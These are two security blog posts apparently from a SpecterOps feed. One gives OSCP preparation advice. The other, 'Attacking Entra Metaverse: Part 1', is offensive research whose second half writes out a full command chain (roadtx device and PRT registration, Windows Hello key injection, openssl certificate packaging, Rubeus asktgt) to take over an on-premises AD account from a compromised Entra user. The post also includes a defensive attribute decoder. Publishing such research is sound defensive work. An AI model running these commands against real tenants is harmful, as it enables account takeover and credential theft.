Infosec & Cybersecurity Training | OffSec

Employers widely recognize the OSCP as a valuable credential for entry-level roles in the offensive security consulting industry, which includes cybersecurity services like penetration tests, red team engagements, and purple team exercises. Its frequent appearance in job postings (which has earned it the joking moniker, “the LSAT for hackers”) and the challenging nature of the exam for junior ethical hackers make it a significant milestone. As a result, it’s common for students who pass the exam to altruistically share their experience in OSCP journey articles, offering insights to others who are on the same path, detailing what they studied, how they approached the exam, and their personal takeaways.

I was originally going to write my own article following this same prototype, but recent developments led me to reconsider. Although I passed the exam in March 2024, the OSCP exam underwent a significant format change in September 2024. Given these changes, I felt that a “review” of my OSCP journey would likely be outdated.

So Why Are You Writing This?

While I consider the OSCP a strong addition to my resume, I’ve found that much of the “value” I gained from the pursuit of the OSCP — value I’ve leveraged during job applications and in my current role — came from unexpected places. As it turns out, the OSCP journey is just as important, if not more so, than the credential itself. With that in mind, I felt compelled to share specific details of my OSCP experience, the lessons that served me well, and the actions I would take if I could go back and do it all over again.

If you look at the bulk of OSCP-related content online, it’s clear that the focus is overwhelmingly on developing the technical mastery needed to pass the exam. While this focus is understandably important, it overlooks the broader picture. The exam itself, along with the technical content required to pass it, offers valuable lessons, but they’re just one part of the overall journey that can contribute to a thriving career in offensive security.

This article aims to fill that gap by offering practical advice that students can follow to not only pass the OSCP but also to grow into well-rounded penetration testers. Some of this advice may be considered “extra mile” exercises, while others are proactive steps that can be employed more passively. Regardless, all of them are designed to help candidates maximize the professional, personal, and financial value of earning an OSCP certification.

A Few Disclaimers Before We Dive In:

  • Article Structure: Due to the length of my original draft, I decided to split this post into a five-part series representing each “phase” of the OSCP journey: 1) pre-course preparation, 2) during the course, 3) during the labs, 4) during the exam, and 5) after the exam (pass or fail)
  • Target Audience: While the primary audience for this article is for students hoping to break into the offensive security consulting industry, I do not mean to discount or exclude individuals who have already secured a consultant role or are pursuing the OSCP for other reasons such as personal enrichment or workplace/regulatory compliance (luckily, I believe much of my advice still generally applies to these individuals)
  • Not an Endorsement: This article is not an endorsement of the OSCP itself (at various points in this series, I will submit what I believe to be valid but fair criticism of the credential), but rather a vehicle to share insights from my personal experience with the certification
  • No Guarantees: I cannot promise that students who follow this advice will pass the OSCP exam or successfully pivot into the offensive security consulting industry
  • Other Paths are Valid: The OSCP is not a gatekeeper to the offensive security consulting industry (I know many junior to senior-level experts without the credential) and I would advise students to consider every path to a successful and fulfilling career before committing to the certification program

Before the Course…

“By failing to prepare, you are preparing to fail.” - Benjamin Franklin

Let’s start with advice that applies to students who are either considering enrolling in the PEN-200 course or are actively planning to. If you could walk away from this article with just three takeaways, here they are:

  1. Estimate whether the return on investment (ROI) will be positive or negative before committing to enrollment, and explore ways to reduce upfront costs
  2. If you’re preparing for the PEN-200 with external training, complete the training before enrolling and use that time to build your resume with practical and challenging achievements
  3. Start creating a reference guide (AKA a “command cheat sheet”) early to improve your testing efficiency and become more familiar with common offensive security tools

Consider the ROI

The OSCP is undeniably an expensive certification program. Given the steep financial and time commitments, one must consider whether the tangible and intangible benefits of the program represent a net-positive, neutral, or net-negative ROI relative to the candidate’s career goals and personal circumstances.

At the time of this article, the base cost of the OSCP certification starts at $1,749, which includes 90 days of access to the online course, lab materials, and a single exam attempt. However, a more realistic estimate — factoring in multiple exam attempts and lab extensions — can easily exceed $2,000. Individual exam retakes cost $250 each, while 30-day lab extensions cost $360 apiece. Additionally, many students choose to invest in external training resources, each with its own associated costs (more on that later). For those seeking an extended study period and additional benefits, the LearnOne subscription offers a year of course and lab access, two exam attempts, and other perks for $2,749/year.

Individual Pricing | OffSec

Additionally, studying for the OSCP is a significant time investment, and failed exam attempts include mandatory cooldown periods that can further extend the overall timeline and costs. While everyone progresses through the PEN-200 course and labs at their own pace, the most effective approach is often a marathon pace, not a sprint. If you’re under a strict time constraint or primarily seeking quick, incremental resume boosters, the OSCP may not align with your current goals.

The OSCP is also not the only practical ethical hacking certification program available, and many of the alternatives are more cost-effective. Some of these courses cover material that is not included in the PEN-200 course but is arguably critical knowledge in the offensive security consulting industry, such as command and control (C2) frameworks and their infrastructure, antivirus (AV) evasion techniques, and more sophisticated web application and Active Directory (AD) attack vectors. While my personal experience is limited to Zero Point Security’s Certified Red Team Operator (CRTO) certification, I’ve heard positive reviews of the Hack the Box Certified Penetration Testing Specialist (HTB CPTS) and Practical Network Penetration Tester (PNPT) credentials. These programs are comparable in difficulty and scope to the OSCP and, perhaps most notably, are currently below $500, making them a more affordable alternative to the OSCP.

Security Certification Roadmap - Paul Jerimy Media

It should also be noted that certification programs are just one of many pathways to a career in offensive security consulting. While they are often a key metric technical recruiters use to assess candidates, other accomplishments — such as independent ethical hacking projects, competitive tournaments, or content creation — can carry equal or even greater weight on an application. These alternative routes showcase not only technical expertise but also initiative, creativity, and passion for cybersecurity, most of which come at a much lower upfront cost.

Still, there are notable benefits to pursuing the OSCP. The PEN-200 course encompasses an impressive breadth of penetration testing knowledge, and the exam itself is notoriously challenging. Considering this, the OSCP has earned a well-deserved reputation as a litmus test for prospective consultants, and technical recruiters therefore eagerly seek OSCP-certified candidates. Additionally, the certification has been around for a relatively long time and has strong name-brand recognition in the industry. Finally, it includes an impressive set of lab networks for students to practically apply the technical skills learned during the course to an environment composed of intentionally vulnerable machines. This aspect in particular provides a well-defined path for an audience — mostly composed of entry-level ethical hackers — from beginner to professional-level penetration testing mastery.

There are also pragmatic reasons to pursue the OSCP. Although I don’t have specific metrics to support my claim, my anecdotal experience in the job market suggests that many organizations incorporate the OSCP in their hiring process. Some firms require candidates to hold the certification, model their technical interviews after the exam, or mandate new hires to earn the credential within a specified time frame. Earning the OSCP early in your job search could therefore open up more doors for you professionally. Moreover, if your next role represents a significant increase in base income, the associated costs of the OSCP may be offset relatively quickly.

One straightforward way to increase the ROI of an OSCP investment is to reduce the upfront cost associated with the bundle. For currently enrolled university students, OffSec offers a 10% discount on a LearnOne subscription through its Achieve financing program. OffSec has also historically held an annual sale on LearnOne subscriptions during November through January. Beyond OffSec, many nonprofits offer partial or complete discounts for common certification programs — including the OSCP — to successful applicants of scholarship programs. Many companies also provide professional development benefits, which can cover the cost of an OSCP voucher. This is especially common among cybersecurity consulting firms and serves as a compelling argument in favor of waiting until after securing a new position before enrolling in the PEN-200.

Discount Programs | OffSec

In summary, the OSCP is a significant financial investment and prospective students should not take it lightly. For many, it represents a major milestone in their ethical hacking journey, a source of personal growth, and a pathway to a new career. For others, its benefits may only be marginal or, depending on the circumstances, not in their best interests. Ultimately, the decision rests with the individual, who should weigh all the factors and considerations to determine if the OSCP is the right choice for them.

Build Your Resume While You Study

While the course provides robust hands-on training, many OSCP-hopefuls — including myself — supplement their PEN-200 training with additional resources to enhance their learning experience. By strategically choosing training options, you can not only deepen your technical knowledge but also strengthen your resume or CV, making your study efforts even more rewarding.

The official OffSec motto is “Try Harder”, which essentially means that successful problem solvers are persistent, creative, and open to new ideas. At the risk of sounding arrogant, I’d suggest adding another adjective to the mix: “retrospective”. Penetration testers and others who face recurring challenges throughout their careers are more likely to succeed if they can learn from past experiences and apply those lessons to current problems. External training, then, is a natural extension of the Try Harder mindset. It’s also prudent, since we can deliberately select exercises we can showcase on a resume, reference in cover letters, or leverage using the STAR method during behavioral interviews.

Generally, I recommend completing external resources before enrolling in PEN-200 for two reasons. First, supplemental training establishes a solid foundation in both theoretical knowledge and practical experience with tactics, techniques, and procedures (TTPs) before starting the course. Although PEN-200 assumes no prior experience in ethical hacking, having a baseline understanding of key concepts can make the course more manageable and improve your efficiency. Second, when you purchase a course and exam voucher, your access to the online course material and lab networks is automatically activated, and the expiration date is set. If you complete the course and labs before your access expires but still require additional training, any time spent on external resources during this period could have been used to take full advantage of OffSec’s official resources (such as reviewing the course material or writing reports on the lab networks, which I will discuss later in the series). Finishing most or all of your external training before starting PEN-200 ensures you aren’t wasting the expensive time you paid for by focusing on extrinsic resources.

Take full advantage of the low-pressure environment of external training by experimenting with different commands, refining your assessment methodology (more on that later in the series), and discovering which technology stack you enjoy hacking the most. Platforms like Hack the Box (HTB) and OffSec’s Proving Grounds are perfect for this. You may even pick up knowledge that isn’t covered in the PEN-200, giving you a potential edge when applying for jobs and helping you stand out as a candidate. Additionally, many external training platforms have active communities where learners can collaborate, share insights, and support each other. Building connections within these communities can provide valuable peer feedback, challenge your assumptions, and give you a sense of camaraderie as you navigate the complexities of penetration testing.

In conclusion, practical supplemental training offers the dual benefit of preparing you for the challenging PEN-200 course while strengthening your profile as a candidate for offensive security consulting roles. Below, I have included a table of my personal recommendations for practical training resources, including their costs, the types of challenges they offer, and how they can enhance your job application. I have focused primarily on resources that I have personally used and are affordable, keeping in mind our previous discussion on ROI.

Begin Writing a Reference Guide

A reference guide is essentially a structure where consultants store key information they need to recall during engagements, such as command syntax or the requirements to launch a specific attack — essentially a “cheat sheet”. Not only is this type of resource valuable for the OSCP labs and exam, but it can also be an asset during a live engagement or published as a personal project that can be included on a job application.

I personally find command reference guides incredibly useful in both simulated training environments and live engagements. A well-organized, personalized reference guide not only improves your efficiency but also reinforces your assessment methodology, core-concept understanding, and technical writing abilities. Think of your guide as a living document that evolves alongside your growth as an ethical hacker, serving as a modular and reliable resource. Starting your reference guide early — even before beginning the PEN-200 course — can significantly enhance your testing efficiency and tool expertise.

A reference guide can arguably be started at any point in the OSCP journey, but I chose to include it in the “Pre-Course” section for multiple reasons. First, the guide should ideally transcend the OSCP and be useful for any ethical hacking project, so it makes sense to include it in one of the sections separate from the PEN-200 material. Second, if the student intends to pursue external training resources, they are bound to encounter useful tools before starting the course, making it prudent to document their usage. Finally, maintaining a reference guide is a continuous process, so I would like to get students in the habit of writing reference guides early as opposed to much later in the OSCP journey.

My favorite tool for creating reference guides is Obsidian, a free and cross-platform node-based note-taking utility. It offers a rich set of features, including an interactive graph, Markdown language support, a tagging system, and much more. Other node-based programs worth considering are Microsoft OneNote, Standard Notes, and CherryTree.


Let’s take impacket-GetUserSPNs as an example. This tool is part of Fortra’s Impacket suite and is based on the original GetUserSPNs.py module. It automates the “Kerberoasting” attack, which allows attackers to retrieve the password hash of a service account in an AD environment.


If we were writing a page for this tool in Obsidian, we could start with an overview section. This would include a link to the source code for the tool, as well as the MITRE ATT&CK framework page for Kerberoasting.

Next, we need to define the requirements necessary for this attack to be feasible. In this case, we should note that the attacker needs access to a valid credential set in AD and that the target user(s) must be a service account associated with a Service Principal Name (SPN). Additionally, it’s important to mention that this tool can be executed remotely from the attacker’s Linux machine on the same network, as some tools require execution on a victim’s Windows machine or through a C2 framework like Cobalt Strike. If verifying the feasibility of an attack requires additional tools, we can create links to other Obsidian pages and embed them here.

Next, we should include some command examples. Tools like impacket-GetUserSPNs often have many different command-line arguments and optional flags, so it’s best to prioritize the ones most relevant to you and omit the others.

Although it is considered [mostly] out of scope for the PEN-200 course, I still recommend including a section discussing how to make a given command stealthier from an operational security (OPSEC) standpoint. This is a critical topic in offensive security consulting and could help you stand out among other job candidates (a candidate who can demonstrate both technical aptitude with a given tool and how to use it stealthily is more desirable than one who only knows the former). While Kerberoasting is generally considered an “OPSEC-loud” technique, we will do our best to evade detection and explain our efforts in the OPSEC section. If you’re unsure whether a TTP can be made stealthier, consider researching it on resources like HackTricks or revisit this section later.

Finally, we will want to include the output from the command’s help menu (impacket-GetUserSPNs --help).

If we wanted to go a step further, we could include an in-depth analysis of what happens “under the hood” when executing a typical Kerberoasting command. This would involve screenshots of the impacket-GetUserSPNs source code and network packets that Wireshark captured in a personal lab (more on this later in the series). Additionally, we could use Obsidian’s tagging system to link this page to a “kerberoasting” tag, unifying all other tools related to the Kerberoasting technique.

On a final note, a reference guide can serve multiple purposes depending on how you design it. A personalized guide — tailored to your study habits, tools, and workflow — can significantly improve your efficiency during exams or live engagements by helping you quickly locate critical information. If you’re like me and struggle with staying organized during an assessment, structuring your guide around an adversary emulation framework (e.g., the MITRE ATT&CK Framework, Lockheed Martin’s Cyber Kill Chain, and Mandiant’s Targeted Attack Lifecycle) can support a systematic approach to problem solving. In any case, it is best to start writing your own guide early and continue building it as you progress on your ethical hacking journey.

Conclusion

I hope you enjoyed the first post in this series. If you have any comments, criticisms, or advice you think should have been included, please feel free to leave a comment. In the next post, I’ll explore additional advice for students as they begin reading the official PEN-200 course materials.


Getting the Most Value out of the OSCP: Pre-Course Prep was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.


Attacking Entra Metaverse: Part 1

13 December 2024, 13:45

This is part one in a two (maybe three…) part series regarding attacker tradecraft around the syncing mechanics between Active Directory and Entra. This first blog post is a short one, and demonstrates how complete control of an Entra user is equal to compromise of the on-premises user. For the entire blog series the point I am trying to make is this:

The Entra Tenant is the trust boundary

That means that if your tenant consists of 100 domains, a compromise of one domain is likely to equal a compromise in all other domains, assuming line of sight to the targeted domain.

Intro to Entra Connect Sync

Entra Connect Sync is the software responsible for propagating changes between Active Directory and Entra (often still referred to as Azure Active Directory). For most cases, the changes are propagated from Active Directory to Entra. As a quick example, consider a new user created in an on-premises Active Directory. The next time Entra Connect Sync runs a sync cycle, a special Entra sync account will send a provisioning message to adminwebservice.onmicrosoft.com to create a new Entra user that represents that user. This process has been covered very well and tooling exists to manipulate this syncing mechanic in AADInternals. An interesting, and fairly unexplored, part of this mechanic is the “metaverse” within Entra Connect.

The metaverse is a virtual representation of multiple data sources. Think of it like a conflict manager for directories. Each data source (AD and Entra) is called a “connected directory”. The connected directories are enumerated via a remote protocol (LDAP, HTTPS, etc.) by a connector specific to that connected directory. Each connected directory has a virtual representation called a “connector space” that holds all of the desired data synced from the connected directory. Once a connected directory runs an “import”, all of its users/devices/groups/etc. exist in the connector space. After import, a synchronization is executed and the connector space objects are “projected” into the metaverse.

The metaverse object is the aggregation of all associated properties from multiple connected directories. Since this is an abundance of lingo, let’s walk through an example. In Active Directory, I’m going to create a user named “jack.burton@hybrid.hotnops.com”. Once the user is created, we run a “delta import” in the Synchronization Service.

As you can see, we have one “Add” and the user Jack Burton now exists in the connector space, but not the Metaverse yet.

In order for the Jack Burton user to be projected into the metaverse, we need to run a sync. In this case, I’ll run a delta sync.

Clicking on the “Projections” link, we can see that a new user has been projected into the Metaverse.

There is also a new export attribute flow, which indicates that this user is to be provisioned to another connected directory (Entra). To trigger this provision, we lastly need to run an export on the Entra connector space.

Don’t worry about the export errors; I have been doing stuff. At this point, we have an end-to-end flow of an object being created in AD, projected into the metaverse, and then provisioned in Entra. But from the Entra Connect standpoint, there’s no special differentiator between Entra and Active Directory: they are both simply connector spaces.

So can attributes go from Entra to Active Directory?

Yes!

The flow of attributes is specified by the Entra Connect rules, which have a default setup that I will speak to in the next blog post. By default, there is one and only one attribute that is written from an Entra user to an Active Directory user, and that is the searchableDeviceKey -> msDS-KeyCredentialLink attribute flow. If msDS-KeyCredentialLink sounds familiar, it’s because it has been covered extensively as an abuse primitive known as “Shadow Credentials”. Long story short, if we can add a public key to the msDS-KeyCredentialLink attribute of a user, we can obtain a TGT for that user with the private key. This means that if we can add a key to an Entra user, we can authenticate as them on-premises. This will prove to be a powerful primitive in the following blog posts when we do a deeper dive on the metaverse and cross-domain attacks.
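Because msDS-KeyCredentialLink is the one attribute Entra Connect writes back into AD, it is the attribute an administrator should be able to read and audit. The following decoder is an added example, not code from this post, roadtools or any other tool named here; it parses the attribute's DN-Binary value according to the KEYCREDENTIALLINK_BLOB layout in MS-ADTS 2.2.20 and surfaces the KeySource (AD or AzureAD), device ID and creation time of each key. The sample value, device GUID and DN are constructed for the example.

```python
# Added example (not from the post or any tool it names): decode an
# msDS-KeyCredentialLink value to audit a user's keys and their origin. Layout
# per MS-ADTS 2.2.20: 4-byte version, then (uint16 length, uint8 id, value)*.
import struct
import uuid
from datetime import datetime, timedelta, timezone

ENTRY_NAMES = {0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
               0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
               0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime"}
KEY_SOURCE = {0x00: "AD", 0x01: "AzureAD"}         # MS-ADTS KeySource values
KEY_USAGE = {0x01: "NGC", 0x08: "FIDO"}            # NGC = Windows Hello key
EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME epoch

def filetime_to_dt(raw):
    """8-byte little-endian FILETIME (100 ns ticks) -> aware datetime."""
    return EPOCH + timedelta(microseconds=struct.unpack("<Q", raw)[0] // 10)

def parse_key_credential(dn_binary):
    """Parse the DN-Binary form 'B:<hex digit count>:<hex>:<DN>' LDAP returns."""
    _, hexlen, hexdata, dn = dn_binary.split(":", 3)
    blob = bytes.fromhex(hexdata)
    if len(hexdata) != int(hexlen) or len(blob) < 4:
        raise ValueError("malformed DN-Binary value")
    entries = {"Version": struct.unpack("<I", blob[:4])[0], "DN": dn}
    pos = 4
    while pos + 3 <= len(blob):
        length, ident = struct.unpack("<HB", blob[pos:pos + 3])
        value = blob[pos + 3:pos + 3 + length]
        if len(value) != length:
            raise ValueError("truncated entry")
        pos += 3 + length
        name = ENTRY_NAMES.get(ident, f"Unknown(0x{ident:02x})")
        if ident in (0x04, 0x05):
            table = KEY_USAGE if ident == 0x04 else KEY_SOURCE
            entries[name] = table.get(value[0], f"0x{value[0]:02x}")
        elif ident == 0x06:
            entries[name] = str(uuid.UUID(bytes_le=value))
        elif ident in (0x08, 0x09):
            entries[name] = filetime_to_dt(value)
        else:
            entries[name] = value.hex()
    return entries

def build_sample():
    """Constructed sample (not real data): one NGC key with KeySource AzureAD."""
    device = uuid.UUID("11111111-2222-3333-4444-555555555555")  # placeholder GUID
    created = datetime(2024, 12, 13, 13, 45, tzinfo=timezone.utc)
    ticks = ((created - EPOCH) // timedelta(microseconds=1)) * 10
    body = b""
    for ident, value in [(0x03, b"\xaa" * 16), (0x04, b"\x01"), (0x05, b"\x01"),
                         (0x06, device.bytes_le), (0x09, struct.pack("<Q", ticks))]:
        body += struct.pack("<HB", len(value), ident) + value
    hexdata = (struct.pack("<I", 0x200) + body).hex()  # 0x200 = blob version 2
    return f"B:{len(hexdata)}:{hexdata}:CN=jack.burton,OU=Users,DC=hybrid,DC=hotnops,DC=com"
```

On a real object the value comes from an LDAP read of msDS-KeyCredentialLink on the user; a key whose creation time, device ID or source the administrator cannot account for is the one to investigate.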

Abusing the WHFB key to gain access to on-premises account

Any key material (a Windows Hello for Business or FIDO2 key) that is added to an Entra user will be synced down to the on-premises user’s msDS-KeyCredentialLink attribute. To perform this attack, we are assuming complete control of an Entra user account. This includes the plaintext password and access to MFA methods. We will try to ease these assumptions later, but for now I simply want to prove out the idea.

Here are the commands that we can run to get an msDS-KeyCredentialLink set on the on-premises user. As a high-level overview, we are going to register a WHFB key. We could also do a FIDO2 key in theory, but this will be easier for demonstration. This attack, at the moment, requires knowledge of the plaintext password and possession of at least one MFA authenticator. To register a WHFB key, we are going to create a fake device, obtain a PRT, and enrich it with an ngcmfa claim. A lot of the heavy lifting for this has already been done by Dirkjan in the roadtools toolkit. The steps are as follows:

Obtain a token for the enterprise device registration resource server

roadtx auth -r urn:ms-drs:enterpriseregistration.windows.net --device-code

We need a token bound to a device identity, which means we need to register a new device and obtain a Primary Refresh Token

roadtx device -a register
roadtx prt -c .\devicel.pem -k .\devicel.key -u jack.burton@hybrid.hotnops.com -p its@llInTH3rEFLEXez

In order to add a WHFB key, we need a token with an MFA claim within the past ten minutes, so we need to “enrich” the PRT

roadtx prtenrich --prt $PRT --prt-sessionkey $SESSION_KEY --ngcmfa-drs-auth --tokens-stdout -u jack.burton@hybrid.hotnops.com

Lastly, add a WHFB key

roadtx winhello --access-token <token from previous step>

At this point, we have added a WHFB key to the Entra user and now need to wait up to 30 minutes for it to sync down to the on-premises user. For the sake of this writeup, I can manually trigger the sync, but note that this is not a normal order of operations for Entra Connect sync. In this image, we can see that a new property has been ingested into the Entra connector space.

The delta sync shows that the updated property has been projected onto the joined user in the metaverse.

Lastly, the export shows that the msDS-KeyCredentialLink has been provisioned to the Active Directory user, as shown in the msDS-KeyCredentialLink row.

We have shown that an attacker can add a public key to the msDS-KeyCredentialLink property, but now what?

We need to do some massaging with the key material to obtain a TGT for jack.burton.

First, we need to create a certificate signing request with the key we registered above

openssl req -new -key .\winhello.key -out .\winhello_cert_req.csr

Second, we need to sign the CSR

openssl x509 -req -days 365 -in .\winhello_cert_req.csr -signkey .\winhello.key -out .\winhello_cert.pem

Lastly, bundle it in a PKCS12 file

openssl pkcs12 -export -out jack_burton.pfx -inkey .\winhello.key -in .\winhello_cert.pem

Now we can use the PFX file with common tools like Rubeus

.\Rubeus.exe asktgt /user:jack.burton /certificate:C:\keys\jack_burton.pfx /password:"pfxPassword" /domain:hybrid.hotnops.com /dc:DC1-HYBRID.hybrid.hotnops.com /getcredentials /show

And there you have it: we obtained a TGT for a user through actions we took on the Entra side. You may be wondering:

“If we have the user plaintext password, why would we need or even want to do this?”

I have three answers:

  1. In the event that an attacker has the ability to modify a user password in Entra when password writeback is disabled, this will enable them to access the account on-premises.
  2. The primitive of adding a key to a user may not necessarily require a password or access to an MFA authenticator. I am currently in search of better ways to do this, and I suspect that there are many ways to achieve the same result.
  3. The primitive of adding a key to an Entra user will serve as a foundation for the cross domain attacks we will perform in the next two parts of this blog series. In many cases, we control the user, password, and MFA authenticators.

References

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/

https://aadinternals.com/talks/Attacking%20Azure%20AD%20by%20abusing%20Synchronisation%20API.pdf

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/concept-azure-ad-connect-sync-architecture


Attacking Entra Metaverse: Part 1 was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.
